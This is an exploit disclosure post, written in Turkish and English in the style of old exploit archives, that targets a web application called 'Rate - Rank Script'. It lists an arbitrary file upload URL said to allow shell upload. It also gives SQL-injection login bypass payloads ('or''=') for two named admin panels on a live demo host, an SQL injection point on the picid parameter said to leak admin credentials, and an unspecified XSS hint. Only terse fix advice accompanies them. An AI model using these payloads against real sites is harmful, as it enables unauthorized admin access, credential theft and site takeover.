Image Shell ;

< ------------------- header data start ------------------- >

#############################################################

# Application Name : Rate - Rank Script

# Vulnerable Type : Arbitrary File Upload Vulnerability

# Infection : Shell Atilarak Site Hacklenebilir

# Risk : Yüksek

# author : Bug Researchers | CWOmer


#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

http://www.ezonescripts.com/productdemos/RateRank/Member_Admin/addSubImage.php?picid=269859

< -- bug code end of -- >


Login Bypass 1 ;

< ------------------- header data start ------------------- >

#############################################################

# Application Name : Rate - Rank Script

# Vulnerable Type : Login Bypass

# Infection : Login Panelinde sifresiz giris yapilabilir

# Bug Fix Advice : Login Paneli Filtrelenmeli

# author : Bug Researchers | CWOmer

# Script Demo : http://www.ezonescripts.com/productdemos/RateRank/Site_Admin/index.php

#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >

username: ’or’’=’
password: ’or’’=’

< -- bug code end -- >

Login Bypass 2 ;

< ------------------- header data start ------------------- >

#############################################################

# Application Name : Rate - Rank Script

# Vulnerable Type : Login Bypass

# Infection : Login Panelinde sifresiz giris yapilabilir

# Bug Fix Advice : Login Paneli Filtrelenmeli

# author : Bug Researchers | CWOmer

# Script Demo : http://www.ezonescripts.com/productdemos/RateRank/Member_Admin/index.php

#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >

username: ’or’’=’
password: ’or’’=’

< -- bug code end -- >

SQL Inj ;

< ------------------- header data start ------------------- >

#############################################################

# Application Name : Rate - Rank Script

# Vulnerable Type : SQL Injection

# Infection : Yönetici User Ve passleri çalinabilir

# Bug Fix Advice : picid degiskeni filtrelenmeli

# author : Bug Researchers | CWOmer


#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

RateRank/Site_Admin/member.php?picid=269859[SQL]

< -- bug code end of -- >


XSS ;

< ------------------- header data start ------------------- >

#############################################################

# Application Name : Rate - Rank Script

# Vulnerable Type : Cross Site Scripting

# Infection : Yönetici ve User cookie’leri çekilebilir.

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

# author : Bug Researchers | CWOmer

#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >

Inputlara XSS komutu girilmeli

< -- bug code end of -- >